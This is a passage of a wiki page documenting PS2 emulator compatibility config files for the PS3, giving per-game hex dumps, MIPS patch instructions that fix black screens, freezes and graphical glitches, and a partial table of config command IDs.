00 00 00 00 00 53 4C 50 4D 2D 35 35 31 ........SLPM-551<br /> 00000020 31 34 14<br /> || 16792 (4.30+) || fixes blackscreen<br /> 0x3D =&gt; 0x4198 (16792)<br /> 0x1B =&gt; (sets some value 1)<br /> 0x15 =&gt; 4<br /> |-<br /> | NPUD20827 || Manhunt ||<br /> 00000000 3D 00 00 00 89 3D 00 00 0A 00 00 00 0F 00 00 00 =....=..........<br /> 00000010 A0 FF 0F 00 00 00 00 00 2D 68 A0 00 A4 FF 0F 00 ........-h......<br /> 00000020 00 00 00 00 14 00 AE 8D A8 FF 0F 00 00 00 00 00 ................<br /> 00000030 10 00 AC 8D AC FF 0F 00 00 00 00 00 50 00 AF 8D ............P...<br /> 00000040 B0 FF 0F 00 00 00 00 00 08 00 8F 15 B4 FF 0F 00 ................<br /> 00000050 00 00 00 00 54 00 AB 8D B8 FF 0F 00 00 00 00 00 ....T...........<br /> 00000060 06 00 CB 15 BC FF 0F 00 00 00 00 00 00 80 8F 25 ...............%<br /> 00000070 C0 FF 0F 00 00 00 00 00 00 80 CE 25 C4 FF 0F 00 ...........%....<br /> 00000080 00 00 00 00 54 00 AE AD C8 FF 0F 00 00 00 00 00 ....T...........<br /> 00000090 50 00 AF AD CC FF 0F 00 00 00 00 00 10 00 AF AD P...............<br /> 000000A0 D0 FF 0F 00 00 00 00 00 14 00 AE AD D4 FF 0F 00 ................<br /> 000000B0 00 00 00 00 04 68 10 08 D8 FF 0F 00 00 00 00 00 .....h..........<br /> 000000C0 5F 00 03 3C 0B 00 00 00 01 00 00 00 22 0D 00 00 _..&lt;........&quot;...<br /> 000000D0 14 01 00 00 08 00 00 00 08 03 FF E8 27 BD FF F0 ............'...<br /> 000000E0 3C 03 00 5F 27 BD FF F0 00 00 00 00 53 4C 55 53 &lt;.._'.......SLUS<br /> 000000F0 2D 32 30 38 32 37 -20827<br /> || 15753 (3.73+) || fixes graphical issues<br /> 0x3D =&gt; 0x3D89 (15753)<br /> 0x0A =&gt; 0x0F<br /> 0xFFFA0,0, 0x00A0682D 2D 68 A0 00 dmove t5,a1<br /> 0xFFFA4,0, 0x8DAE0014 14 00 AE 8D lw t6,0x14(t5)<br /> 0xFFFA8,0, 0x8DAC0010 10 00 AC 8D lw t4,0x10(t5)<br /> 0xFFFAC,0, 0x8DAF0050 50 00 AF 8D lw t7,0x50(t5)<br /> 0xFFFB0,0, 0x158F0008 08 00 8F 15 bne t4,t7,pos_000FFFD4<br /> 0xFFFB4,0, 0x8DAB0054 54 00 AB 8D lw t3,0x54(t5)<br /> 0xFFFB8,0, 0x15CB0006 06 00 CB 15 bne t6,t3,pos_000FFFD4<br /> 0xFFFBC,0, 0x258F8000 00 80 8F 25 addiu t7,t4,-0x8000<br /> 0xFFFC0,0, 0x25CE8000 00 80 CE 25 addiu t6,-0x8000<br /> 0xFFFC4,0, 0xADAE0054 54 00 AE AD sw t6,0x54(t5)<br /> 0xFFFC8,0, 0xADAF0050 50 00 AF AD sw t7,0x50(t5)<br /> 0xFFFCC,0, 0xADAF0010 10 00 AF AD sw t7,0x10(t5)<br /> 0xFFFD0,0, 0xADAE0014 14 00 AE AD sw t6,0x14(t5)<br /> 0xFFFD4,0, 0x08106804 04 68 10 08 j pos_0041A010<br /> 0xFFFD8,0, 0x3C03005F 5F 00 03 3C lui v1,0x005F<br /> 0x0B =&gt; 1<br /> 0xD22, (disc sector)<br /> 0x114, (offset -&gt; 0x691108 in iso)<br /> 0x08,<br /> 0x0803FFE8 E8 FF 03 08 j pos_000FFFA0<br /> 0x27BDFFF0 F0 FF BD 27 addiu sp,-0x10<br /> 0x3C03005F 5F 00 03 3C lui v1,0x005F<br /> 0x27BDFFF0 F0 FF BD 27 addiu sp,-0x10<br /> &lt;pre&gt;<br /> z_un_0041a008:<br /> <br /> lui v1,0x005F &lt;- gets overwritten<br /> addiu sp,-0x10<br /> lw v0,-0x5C14(v1)<br /> sd ra,(sp)<br /> jalr v0<br /> nop <br /> ld ra,(sp)<br /> jr ra<br /> addiu sp,0x10<br /> nop <br /> &lt;/pre&gt;<br /> |-<br /> | NPED00145 || Max Payne ||<br /> 00000000 3D 00 00 00 89 3D 00 00 01 00 00 00 F4 E9 52 00 =....=........R.<br /> 00000010 03 00 00 00 01 00 00 00 78 EB 52 00 02 00 00 00 ........x.R.....<br /> 00000020 00 00 00 00 53 4C 45 53 2D 35 30 33 32 35 ....SLES-50325<br /> || 15753 (3.73+) || fixes game hang on first cutscene/cutscenes<br /> 0x3D =&gt; 0x3D89 (15753)<br /> 0x01 =&gt; 0x52E9F4, 3 (applies to main_p.run ELF on disc: 0x52E9F4 dmove a1,v0 )<br /> 0x01 =&gt; 0x52EB78, 2 (applies to main_p.run ELF on disc: 0x52EB78 lq s1,0x10(sp) )<br /> |-<br /> | NPED00055 || MX World Tour: Featuring Jamie Little ||<br /> <br /> || || blackscreen<br /> <br /> |-<br /> | NPUD21577 || Odin Sphere ||<br /> 00000000 3D 00 00 00 10 3D 00 00 0B 00 00 00 02 00 00 00 =....=..........<br /> 00000010 52 04 00 00 F8 03 00 00 04 00 00 00 2D 02 49 0C R...........-.I.<br /> 00000020 2D 02 49 14 52 04 00 00 70 04 00 00 04 00 00 00 -.I.R...p.......<br /> 00000030 2D 03 49 0C 2D 03 49 14 15 00 00 00 04 00 00 00 -.I.-.I.........<br /> || 15632 (3.70+) ||<br /> 0x3D =&gt; 0x3D10 (15632)<br /> 0x0B =&gt; 2<br /> 0x452, (sector)<br /> 0x3F8, (offset -&gt; 0x2293EC in iso)<br /> 0x04,<br /> 0x0C49022D sltiu v0,t0,0x490C,<br /> 0x1449022D sltiu v0,t0,0x4914,<br /> 0x452, (sector)<br /> 0x470, (offset -&gt; 0x229464 in iso)<br /> 0x04,<br /> 0x0C49032D sltiu v1,t0,0x490C,<br /> 0x1449032D sltiu v1,t0,0x4914<br /> 0x15 =&gt; 4<br /> |-<br /> | NPJD00028 || Phantasy Star Complete Collection ||<br /> 00000000 3D 00 00 00 B8 41 00 00 45 00 00 00 00 00 00 00 =....A..E.......<br /> 00000010 53 4C 50 4D 2D 36 32 37 37 35 SLPM-62775<br /> || 16824 (4.40+)||<br /> 0x3D =&gt; 0x41B8 (16824)<br /> 0x45 =&gt; (sets some value 1)<br /> |-<br /> | NPUC97142 || Primal ||<br /> 00000000 3D 00 00 00 65 3D 00 00 12 00 00 00 0D 00 00 00 =...e=..........<br /> 00000010 00 00 00 04 00 00 00 00 02 00 03 00 5F 01 00 00 ............_...<br /> 00000020 8D BD 6F 2C 67 03 00 00 02 00 03 00 6B 01 00 00 ..o,g.......k...<br /> 00000030 31 35 70 E9 72 03 00 00 03 00 02 00 60 9B 39 10 15p.r.......`.9.<br /> 00000040 18 9C 39 10 0B 00 00 00 01 00 00 00 47 07 00 00 ..9.........G...<br /> 00000050 6C 04 00 00 04 00 00 00 80 5F 03 3C 80 00 03 3C l........_.&lt;...&lt;<br /> || 15717 (3.73+) || fixes loading screen freezing<br /> 0x3D =&gt; 0x3D65 (15717)<br /> 0x12 =&gt; 0x0D, (fixes freezing)<br /> 00 00 00 04 0x04000000 (64 MB?)<br /> 00 00 00 00 <br /> 02 00&gt;'''03 00'''&lt; Count, Type 2<br /> 5F 01 00 00 0x15F<br /> 8D BD 6F 2C 0x2C6FBD8D<br /> 67 03 00 00 0x367<br /> 02 00&gt;'''03 00'''&lt; Count, Type 2<br /> 6B 01 00 00 0x16B<br /> 31 35 70 E9 0xE9703531<br /> 72 03 00 00 0x372<br /> 03 00&gt;'''02 00'''&lt; Count<br /> 60 9B 39 10 -&gt; 0x399B60 ctc2 $zero, $5<br /> 18 9C 39 10 -&gt; 0x399C18 ctc2 $zero, $5<br /> 0x0B =&gt; 1<br /> 0x747, (disc sector)<br /> 0x46C, (offset -&gt; 0x3A3C60 - this patch is for another (hidden) .elf (.vutext) on disc) <br /> 0x04,<br /> 0x3C035F80 lui v1,0x5F80,<br /> 0x3C030080 lui v1,0x0080<br /> |-<br /> | NPUD21120 || Psychonauts ||<br /> 00000000 3D 00 00 00 89 3D 00 00 0B 00 00 00 01 00 00 00 =....=..........<br /> 00000010 12 01 00 00 58 00 00 00 04 00 00 00 00 00 00 00 ....X...........<br /> 00000020 11 CF FF F9 00 00 00 00 53 4C 55 53 2D 32 31 31 ........SLUS-211<br /> 00000030 32 30 20<br /> || 15753 (3.73+) || <br /> 0x3D =&gt; 0x3D89 (15753)<br /> 0x0B =&gt; 1<br /> 0x112, (sector)<br /> 0x58, (offset -&gt; 0x8904C in iso)<br /> 0x04,<br /> 0x00000000 nop, <br /> 0xF9FFCF11 beq t6,t7,-0x18<br /> |-<br /> | NPUD20272 || Rayman Arena||<br /> 00000000 3D 00 00 00 89 3D 00 00 12 00 00 00 11 00 00 00 =....=..........<br /> 00000010 00 00 00 04 00 00 00 00 02 00 04 00 00 00 00 00 ................<br /> 00000020 AE B3 4E 5D 20 02 00 00 46 02 00 00 03 00 09 00 ..N] ...F.......<br /> 00000030 B0 E9 1D 10 94 EB 1D 10 00 EC 1D 10 54 EC 1D 10 ............T...<br /> 00000040 A0 EE 1D 10 DC EE 1D 10 78 F0 1D 10 B4 F0 1D 10 ........x.......<br /> 00000050 54 F1 1D 10 00 00 00 00 53 4C 55 53 2D 32 30 32 T.......SLUS-202<br /> 00000060 37 32 72 <br /> || 15753 (3.73+) || <br /> 0x3D =&gt; 0x3D89 (15753)<br /> 0x12 =&gt; 0x11<br /> 00 00 00 04 <br /> 00 00 00 00 <br /> 02 00&gt;'''04 00'''&lt; Count<br /> 00 00 00 00 <br /> AE B3 4E 5D <br /> 20 02 00 00 <br /> 46 02 00 00 <br /> 03 00&gt;'''09 00'''&lt; Count<br /> B0 E9 1D 10 -&gt; 0x1DE9B0 ctc2 $t0, $6<br /> 94 EB 1D 10 -&gt; 0x1DEB94 ctc2 $t0, $6<br /> 00 EC 1D 10 -&gt; 0x1DEC00 ctc2 $t0, $6<br /> 54 EC 1D 10 -&gt; 0x1DEC54 ctc2 $t0, $6<br /> A0 EE 1D 10 -&gt; 0x1DEEA0 ctc2 $t0, $6<br /> DC EE 1D 10 -&gt; 0x1DEEDC ctc2 $t0, $6<br /> 78 F0 1D 10 -&gt; 0x1DF078 ctc2 $t0, $6<br /> B4 F0 1D 10 -&gt; 0x1DF0B4 ctc2 $t0, $6<br /> 54 F1 1D 10 -&gt; 0x1DF154 ctc2 $t0, $6<br /> |-<br /> | NPJD00079 || Raw Danger! ||<br /> <br /> || || fps problem<br /> <br /> |-<br /> | NPUD20442 || Red Faction 2 ||<br /> 00000000 3D 00 00 00 42 3F 00 00 19 00 00 00 00 00 00 00 =...B?..........<br /> 00000010 53 4C 55 53 2D 32 30 34 34 32 SLUS-20442<br /> || 16194 (4.00+) || <br /> 0x3D =&gt; 0x3F42 (16194)<br /> 0x19 =&gt; (sets some value 1)<br /> |-<br /> | NPUD20471 || Rygar ||<br /> 00000000 3D 00 00 00 89 3D 00 00 0E 00 00 00 A8 7D 14 00 =....=.......}..<br /> 00000010 00 00 00 00 53 4C 55 53 2D 32 30 34 37 31 ....SLUS-20471<br /> || 15753 (3.73+) || fixes hard crash at start when leaving the place<br /> 0x3D =&gt; 0x3D89 (15753)<br /> 0x0E =&gt; 0x147DA8 (offset)<br /> <br /> .text:00147DA8 sub.s $f12, $f20, $f12<br /> |-<br /> | NPUD20974 || Shin Megami Tensei Digital Devil Saga 1|| <br /> 00000000 3D 00 00 00 EC 42 00 00 46 00 00 00 48 00 00 00 =....B..F...H...<br /> 00000010 01 00 00 00 90 D0 03 00 00 00 00 00 53 4C 55 53 ............SLUS<br /> 00000020 2D 32 30 39 37 34 -20974<br /> || 17132 (4.50+) || fixes screen shakes/framerate cracks<br /> 0x3D =&gt; 0x42EC (17132)<br /> 0x46 =&gt; (sets some value 1)<br /> 0x48 =&gt; 0x1 , 0x3D090<br /> |-<br /> | NPUD20911 || Shin Megami Tensei Nocturne || <br /> 00000000 3D 00 00 00 F6 41 00 00 46 00 00 00 00 00 00 00 =....A..F.......<br /> 00000010 53 4C 55 53 2D 32 30 39 31 31 SLUS-20911<br /> || 16886 (4.40+) || fixes screen shakes/flickers <br /> 0x3D =&gt; 0x41F6 (16886)<br /> 0x46 =&gt; (sets some value 1)<br /> |-<br /> | NPUD21621 || Shin Megami Tensei Persona 3 FES ||<br /> 00000000 3D 00 00 00 48 41 00 00 0A 00 00 00 20 00 00 00 =...HA...... ...<br /> 00000010 00 FA 0F 00 00 00 00 00 E0 00 A4 8F 04 FA 0F 00 .·......Ó.ñÅ.·..<br /> 00000020 00 00 00 00 6C 01 03 24 08 FA 0F 00 00 00 00 00 ....l..$.·......<br /> 00000030 0A 00 83 14 0C FA 0F 00 00 00 00 00 FF 00 04 24 ..â..·...... ..$<br /> 00000040 10 FA 0F 00 00 00 00 00 B8 26 04 00 14 FA 0F 00 .·......©&amp;...·..<br /> 00000050 00 00 00 00 27 20 84 00 18 FA 0F 00 00 00 00 00 ....' ä..·......<br /> 00000060 D0 00 A3 DF 1C FA 0F 00 00 00 00 00 24 18 83 00 ð.ú¯.·......$.â.<br /> 00000070 20 FA 0F 00 00 00 00 00 0B 00 63 64 24 FA 0F 00 ·........cd$·..<br /> 00000080 00 00 00 00 33 00 04 24 28 FA 0F 00 00 00 00 00 ....3..$(·......<br /> 00000090 B8 26 04 00 2C FA 0F 00 00 00 00 00 25 18 83 00 ©&amp;..,·......%.â.<br /> 000000A0 30 FA 0F 00 00 00 00 00 D0 00 A3 FF 34 FA 0F 00 0·......ð.ú 4·..<br /> 000000B0 00 00 00 00 E1 B3 11 08 38 FA 0F 00 00 00 00 00 ....ߦ..8·......<br /> 000000C0 50 00 64 8E 7C CF 46 00 50 00 64 8E 80 FE 03 08 P.dÄ|¤F.P.dÄǦ..<br /> 000000D0 40 FA 0F 00 00 00 00 00 00 3C 04 3C 44 FA 0F 00 @·.......&lt;.&lt;D·..<br /> 000000E0 00 00 00 00 18 3F 05 3C 48 FA 0F 00 00 00 00 00 .....?.&lt;H·......<br /> 000000F0 20 00 24 AE 4C FA 0F 00 00 00 00 00 24 00 24 AE .$«L·......$.$«<br /> 00000100 50 FA 0F 00 00 00 00 00 60 00 25 AE 54 FA 0F 00 P·......`.%«T·..<br /> 00000110 00 00 00 00 64 00 24 AE 58 FA 0F 00 00 00 00 00 ....d.$«X·......<br /> 00000120 A0 00 24 AE 5C FA 0F 00 00 00 00 00 A4 00 25 AE á.$«\·......ñ.%«<br /> 00000130 60 FA 0F 00 00 00 00 00 E0 00 25 AE 64 FA 0F 00 `·......Ó.%«d·..<br /> 00000140 00 00 00 00 E4 00 25 AE 68 FA 0F 00 00 00 00 00 ....õ.%«h·......<br /> 00000150 04 00 04 24 6C FA 0F 00 00 00 00 00 39 9B 10 08 ...$l·......9ø..<br /> 00000160 70 FA 0F 00 00 00 00 00 10 00 25 26 DC 6C 42 00 p·........%&amp;_lB.<br /> 00000170 04 00 04 24 90 FE 03 08 E0 6C 42 00 10 00 25 26 ...$ɦ..ÓlB...%&amp;<br /> 00000180 00 00 00 00 30 6A 4C 00 80 3F 02 3C 7F 3F 02 3C ....0jL.Ç?.&lt;?.&lt;<br /> 00000190 21 00 00 00 00 00 00 00 15 00 00 00 04 00 00 00 !...............<br /> 000001A0 00 00 00 00 53 4C 55 53 2D 32 31 36 32 31 ....SLUS-21621<br /> || 16712 (4.25+)||<br /> 0x3D =&gt; 0x4148 (16712)<br /> 0x0A =&gt; 0x20<br /> 0xFFA00,0,0x8FA400E0 lw a0,0xE0(sp)<br /> 0xFFA04,0,0x2403016C li v1,0x16C<br /> 0xFFA08,0,0x1483000A bne a0,v1,pos_000FFA34<br /> 0xFFA0C,0,0x240400FF li a0,0xFF<br /> 0xFFA10,0,0x000426B8 dsll a0,0x1A<br /> 0xFFA14,0,0x00842027 nor a0,a0<br /> 0xFFA18,0,0xDFA300D0 ld v1,0xD0(sp)<br /> 0xFFA1C,0,0x00831824 and v1,a0,v1<br /> 0xFFA20,0,0x6463000B daddiu v1,0x000B<br /> 0xFFA24,0,0x24040030 li a0,0x30<br /> 0xFFA28,0,0x000426B8 dsll a0,0x1A<br /> 0xFFA2C,0,0x00831825 or v1,a0,v1<br /> 0xFFA30,0,0xFFA300D0 sd v1,0xD0(sp)<br /> 0xFFA34,0,0x0811B3E1 j pos_0046CF84<br /> 0xFFA38,0,0x8E640050 lw a0,0x50(s3)<br /> 0x46CF7C,0x8E640050 (lw a0,0x50(s3),0x0803FE80 j pos_000FFA00<br /> 0xFFA40,0,0x3C043C00 lui a0,0x3C00<br /> 0xFFA44,0,0x3C053F18 lui a1,0x3F18<br /> 0xFFA48,0,0xAE240020 sw a0,0x20(s1)<br /> 0xFFA4C,0,0xAE240024 sw a0,0x24(s1)<br /> 0xFFA50,0,0xAE250060 sw a1,0x60(s1)<br /> 0xFFA54,0,0xAE240064 sw a0,0x64(s1)<br /> 0xFFA58,0,0xAE2400A0 sw a0,0xA0(s1)<br /> 0xFFA5C,0,0xAE2500A4 sw a1,0xA4(s1)<br /> 0xFFA60,0,0xAE2500E0 sw a1,0xE0(s1)<br /> 0xFFA64,0,0xAE2500E4 sw a1,0xE4(s1)<br /> 0xFFA68,0,0x24040004 li a0,0x4<br /> 0xFFA6C,0,0x08109B39 j pos_00426CE4<br /> 0xFFA70,0,0x26250010 addiu a1,s1,0x10<br /> 0x426CDC,0x24040004(li a0,0x4),0x0803FE90 j pos_000FFA40<br /> 0x426CE0,0x26250010(addiu a1,s1,0x10),0 nop<br /> 0x4C6A30,0x3C023F80(lui v0,0x3F80),0x3C023F7F lui v0,0x3F7F<br /> 0x21 =&gt; 0<br /> 0x15 =&gt; 4<br /> |-<br /> | NPUD21782 || Shin Megami Tensei Persona 4 || <br /> 00000000 3D 00 00 00 89 3D 00 00 0A 00 00 00 01 00 00 00 =....=..........<br /> 00000010 60 9C 18 00 80 3F 02 3C 7F 3F 02 3C 00 00 00 00 `....?.&lt;.?.&lt;....<br /> 00000020 53 4C 55 53 2D 32 31 37 38 32 SLUS-21782<br /> || 15753 (3.73+) || Dungeon name in the corner is glitched (shows black bar).<br /> 0x3D =&gt; 0x3D89 (15753)<br /> 0x0A =&gt; 1<br /> 0x189C60, 0x3C023F80 lui v0,0x3F80 <br /> 0x3C023F7F lui v0,0x3F7F<br /> |-<br /> | NPUC97355 || Siren ||<br /> 00000000 3D 00 00 00 15 41 00 00 19 00 00 00 00 00 00 00 =....A..........<br /> 00000010 53 43 55 53 2D 39 37 33 35 35 SCUS-97355<br /> || 16661 (4.25+)|| <br /> 0x3D =&gt; 0x4115 (16661)<br /> 0x19 =&gt; (sets some value 1)<br /> |-<br /> | NPED00272 || Summoner ||<br /> 00000000 3D 00 00 00 89 3D 00 00 2C 00 00 00 01 00 00 00 =....=..,.......<br /> 00000010 00 00 00 00 53 4C 45 53 2D 38 32 30 30 35 ....SLES-82005 <br /> || 15753 (3.73+) || fixes blackscreen<br /> 0x3D =&gt; 0x3D89 (15753)<br /> 0x2C =&gt; 0x1<br /> |-<br /> | NPUC97264 || Syphon Filter The Omega Strain || <br /> 00000000 3D 00 00 00 1F 40 00 00 12 00 00 00 05 00 00 00 =....@..........<br /> 00000010 00 00 00 00 00 00 00 00 01 00 02 00 31 00 99 18 ............1...<br /> 00000020 32 00 B6 18 0B 00 00 00 01 00 00 00 F5 05 00 00 2...............<br /> 00000030 8C 02 00 00 04 00 00 00 00 00 00 00 0C 0D C1 54 ...............T<br /> 00000040 0A 00 00 00 0B 00 00 00 F8 35 37 00 1B 52 06 4B .........57..R.K<br /> 00000050 00 80 43 48 FC 35 37 00 00 80 43 48 1B 52 06 4B ..CH.57...CH.R.K<br /> 00000060 EC 6F 3A 00 00 00 00 00 00 00 11 64 F8 6F 3A 00 .o:........d.o:.<br /> 00000070 78 A1 0E 0C 80 FE 03 0C 00 FA 0F 00 00 00 00 00 x...............<br /> 00000080 02 00 08 3C 04 FA 0F 00 00 00 00 00 2B 40 28 02 ...&lt;........+@(.<br /> 00000090 08 FA 0F 00 00 00 00 00 02 00 00 15 0C FA 0F 00 ................<br /> 000000A0 00 00 00 00 54 00 01 3C 10 FA 0F 00 00 00 00 00 ....T..&lt;........<br /> 000000B0 00 28 20 AC 14 FA 0F 00 00 00 00 00 78 A1 0E 08 .( .........x...<br /> 000000C0 18 FA 0F 00 00 00 00 00 01 00 31 26 00 00 00 00 ..........1&amp;....<br /> 000000D0 53 43 55 53 2D 39 37 32 36 34 SCUS-97264<br /> || 16415 (4.20+)|| fixes texture bugs<br /> 0x3D =&gt; 0x401F (16415)<br /> 0x12 =&gt; 0x5 <br /> 00 00 00 00 <br /> 00 00 00 00 <br /> 01 00&gt;'''02 00'''&lt; Count<br /> 31 00 99 18 -&gt; 0x18990<br /> 32 00 B6 18 -&gt; 0x18B60<br /> 0x0B =&gt; 1<br /> 0x5F5, (sector)<br /> 0x28C, (offset -&gt; 0x2FAA80 in iso)<br /> 0x04,<br /> 0x00000000 (nop), <br /> 0x54C10D0C (jal sub_370550)<br /> 0x0A =&gt; 0xB<br /> 0x3735F8, 0x4B06521B (cop2 0x106521B, vmulw.x vf08,vf10,vf06w), 0x48438000 cfc2 v1,Status<br /> 0x3735FC, 0x48438000 (cfc2 v1,Status), 0x4B06521B cop2 0x106521B (vmulw.x vf08,vf10,vf06w)<br /> 0x3A6FEC, 0 (nop), 0x64110000 li $s1, 0<br /> 0x3A6FF8, 0x0C0EA178 (jal pos_003A85E0), 0x0c03FE80 jal pos_000FFA00<br /> 0xFFA00, 0 (nop), 0x3C080002 lui t0,0x0002<br /> 0xFFA04, 0 (nop), 0x0228402B sltu t0,s1,t0<br /> 0xFFA08, 0 (nop), 0x15000002 bnez t0,pos_000FFA14<br /> 0xFFA0C, 0 (nop), 0x3C010054 lui at,0x0054<br /> 0xFFA10, 0 (nop), 0xAC202800 sw zero,0x2800(at)<br /> 0xFFA14, 0 (nop), 0x080EA178 j pos_003A85E0<br /> 0xFFA18, 0 (nop), 0x26310001 addiu s1,0x1<br /> |-<br /> | NPJD00080 || Zettaizetsumei Toshi (Disaster Report) ||<br /> 00000000 3D 00 00 00 26 44 00 00 44 00 00 00 00 00 00 00 =...&amp;D..D.......<br /> 00000010 53 4C 50 53 2D 32 35 31 31 33 SLPS-25113<br /> || 17446 (4.78)|| <br /> 0x3D =&gt; 0x4426 (17446)<br /> 0x44 =&gt; (disables smoothing and smoothing option)<br /> |}<br /> <br /> ==== commands ====<br /> <br /> ps2_netemu.self fw4.50 sub_12D7D8<br /> params are uint32_t unless noted.<br /> <br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! CMD ID !! Example !! Notes<br /> |-<br /> | 0x00||||<br /> |-<br /> | 0x01|||| 2x uint32_t Params ( offset, hack id 0-0x3B) - add_hook?<br /> (Grand Theft Auto 3 (EU) uses 0x349790, 0x10 (somewhat floats related))<br /> (Max Payne uses 0x52E9F4, 3 and 0x52EB78, 2 (set lwsync 0) )<br /> <br /> {| class=&quot;wikitable sortable&quot;<br /> |-<br /> ! function id !! note<br /> |-<br /> |0x00 || <br /> |-<br /> |0x01 || <br /> |-<br /> |0x02 || <br /> Max Payne<br /> sets some sync off?<br /> |-<br /> |0x03 || <br /> Max Payne<br /> sets some sync on?<br /> |-<br /> |0x04 || <br /> |-<br /> |0x05 || <br /> |-<br /> |0x06 || <br /> |-<br /> |0x07 || <br /> |-<br /> |0x08 ||<br /> |-<br /> |0x09 || <br /> |-<br /> |0x0A || <br /> |-<br /> |0x0B || <br /> |-<br /> |0x0C || <br /> |-<br /> |0x0D || <br /> |-<br /> |0x0E ||<br /> |-<br /> |0x0F || <br /> GTA 3 (US)<br /> using 0x348B40, 0x18E1F0, 0x348EC8 ( + 200000000 base )<br /> |-<br /> |0x10 || <br /> GTA 3 (EU)<br /> using 0x349790, 0x18E1F0, 0x349B18 ( + 200000000 base )<br /> |-<br /> |0x11 || <br /> GTA 3 (JP/AS) ?<br /> using 0x3495C0, 0x18E1F0, 0x349948 ( + 200000000 base )<br /> |-<br /> |0x12 || <br /> condition ...<br /> store 0 in [ 0x204FC500 + 200000000 base]<br /> |-<br /> |0x13 || <br /> |-<br /> |0x14 || <br /> |-<br /> |0x15 || <br /> |-<br /> |0x16 || <br /> store 0x01114BA8 in [ 0x208EAB4C + 200000000 base]<br /> store 0x010C9E40 in [ 0x208EAB6C + 200000000 base]<br /> |-<br /> |0x17 || <br /> condition r18 == 0x8000<br /> setting:<br /> stores 0x40490FDA somewhere <br /> |-<br /> |0x18 ||<br /> condition [ 0x20183F04 + 200000000 base ] == 0x0C060F2C <br /> setting:<br /> stores 0 in address 0x20183F04, 0x20183F34, 0x20183F3C ( + 0x200000000 base )<br /> 0x183F0C, sub_46334 (4.70)<br /> 0x183F3C, sub_45DA4 (4.70)<br /> 0x183D74, sub_47B50 (4.70)<br /> |-<br /> |0x19 || <br /> |-<br /> |0x1A || <br /> store 0 in [ 0x209FD560 + 200000000 base]<br /> store 0 in [ 0x209F9550 + 200000000 base]<br /> store 0 in [ 0x20A01570 + 200000000 base]<br /> store 0 in [ 0x209F9540 + 200000000 base]<br /> store 0 in [ 0x209F5540 + 200000000 base]<br /> store 0 in [ 0x209F1530 + 200000000 base]<br /> |-<br /> |0x1B || <br /> store 0 in [ 0x20552168 + 200000000 base]<br /> |-<br /> |0x1C || <br /> store 1 in [ 0x20552168 + 200000000 base]<br /> |-<br /> |0x1D || <br /> store 0 in [ 0x20556C08 + 200000000 base]<br /> |-<br /> |0x1E || <br /> store 1 in [ 0x20556C08 + 200000000 base]<br /> |-<br /> |0x1F || <br /> store 0 in [ 0x205243D8 + 200000000 base]<br /> |-<br /> |0x20 || <br /> store 1 in [ 0x205243D8 + 200000000 base]<br /> |-<br /> |0x21 || <br /> store 0 in [ 0x20524F88 + 200000000 base]<br /> |-<br /> |0x22 || <br /> store 1 in [ 0x20524F88 + 200000000 base]<br /> |-<br /> |0x23 || <br /> store 0 in [ 0x2047E7F8 + 200000000 base]<br /> |-<br /> |0x24 || <br /> store 1 in [ 0x2047E7F8 + 200000000 base]<br /> |-<br /> |0x25 || <br /> store 0 in [ 0x204802B8 + 200000000 base]<br /> |-<br /> |0x26 || <br /> store 1 in [ 0x204802B8 + 200000000 base]<br /> |-<br /> |0x27 || <br /> store 0 in [ 0x20586348 + 200000000 base]<br /> |-<br /> |0x28 ||<br /> store 1 in [ 0x20586348 + 200000000 base]<br /> |-<br /> |0x29 || <br /> store 0 in [ 0x205868A8 + 200000000 base]<br /> |-<br /> |0x2A ||<br /> store 1 in [ 0x205868A8 + 200000000 base]<br /> |-<br /> |0x2B || <br /> |-<br /> |0x2C || <br /> |-<br /> |0x2D || <br /> |-<br /> |0x2E || <br /> |-<br /> |0x2F || <br /> condition [ 0x37B0C4 + 200000000 base ] == 0 -&gt; 00 10 0B 98 <br /> |-<br /> |0x30 || <br /> condition [ 0x37B704 + 200000000 base ] == 0 -&gt; 00 10 0B 98 <br /> |-<br /> |0x31 || <br /> condition [ 0x37630C + 200000000 base ] == 0 -&gt; 00 10 0B A8 <br /> |-<br /> |0x32 || <br /> condition [ 0x37BB0C + 200000000 base ] == 0 -&gt; 00 10 0B A8 <br /> |-<br /> |0x33 || <br /> |-<br /> |0x34 || not filled<br /> |-<br /> |0x35 || <br /> |-<br /> |0x36 || <br /> |-<br /> |0x37 || <br /> |-<br /> |0x38 ||<br /> |-<br /> |0x39 || <br /> |-<br /> |0x3A || <br /> |-<br /> |0x3B || <br /> GTA 3 (JP/AS) ?<br /> using 0x351210, 0x18F590, 0x351568 ( + 200000000 base )<br /> |}<br /> |-<br /> | 0x02|||| 1 Param, Config file revision ?<br /> |-<br /> | 0x03|||| 0 Param, sets something 0<br /> (Fire Pro Wrestling Returns)<br /> |-<br /> | 0x04|||| 1 Param uint32_t index (i*0x80, special 0x12345: 0x91a280?)<br /> |-<br /> | 0x05|||| read next command<br /> |-<br /> | 0x06|||| 0 Param, sets something 0x14F80 (85888'd)<br /> |-<br /> | 0x07|||| 1 Param uint32_t (default 1)<br /> |-<br /> | 0x08|||| 8 Param uint32_t<br /> Maximum Amount of Usage: 3 times<br /> |-<br /> | 0x09 |||| uint32_t count, &lt;list&gt; (offset, original opcode, original opcode, replace opcode, replace opcode)<br /> (Dark Cloud uses 1)<br /> (Dead Or Alive 2 Hardcore uses 1)<br /> Maximum List Count: 32<br /> |-<br /> | 0x0A|||| uint32_t count, &lt;List&gt; (offset, original opcode, replace opcode)<br /> (Deadly Strike uses 1 )<br /> (Dragon Force uses 2)<br /> Maximum List Count: 32<br /> |-<br /> | 0x0B|||| 1 Param uint32_t count, &lt;List&gt; {sector id, offset, sizeof present opcodes, replace opcodes, original opcodes}<br /> offset on disc = sector id * sector size + offset (-0xC)<br /> (Dead Or Alive 2 Hardcore uses 7)<br /> (Gradius V uses 1)<br /> (Grand Theft Auto III uses 1)<br /> (Katamari Damacy uses 1)<br /> (Manhunt uses 1)<br /> (Odin Sphere uses 2)<br /> (Primal uses 1)<br /> (Psychonauts uses 1)<br /> (Syphon Filter The Omega Strain uses 1)<br /> Maximum List Count: 47<br /> |-<br /> | 0x0C |||| 1 Param (uint16_t, uint16_t) - 0/1/2,&lt;0x63&gt;<br /> |-<br /> | 0x0D |||| 1 Param, true/false?<br /> Default Init = 1?<br /> 0 == skip some code, <br /> 1 == some code + checks<br /> |-<br /> | 0x0E |||| 1 Param offset <br /> floating point accurency?<br /> subtract accurency?<br /> (Rygar only has 0x147DA8 sub.s $f12, $f20, $f12)<br /> Maximum Amount of Usage: 31 times<br /> |-<br /> | 0x0F |||| List &lt;uint32_t Param, uint32_t Param&gt; <br /> (Dark 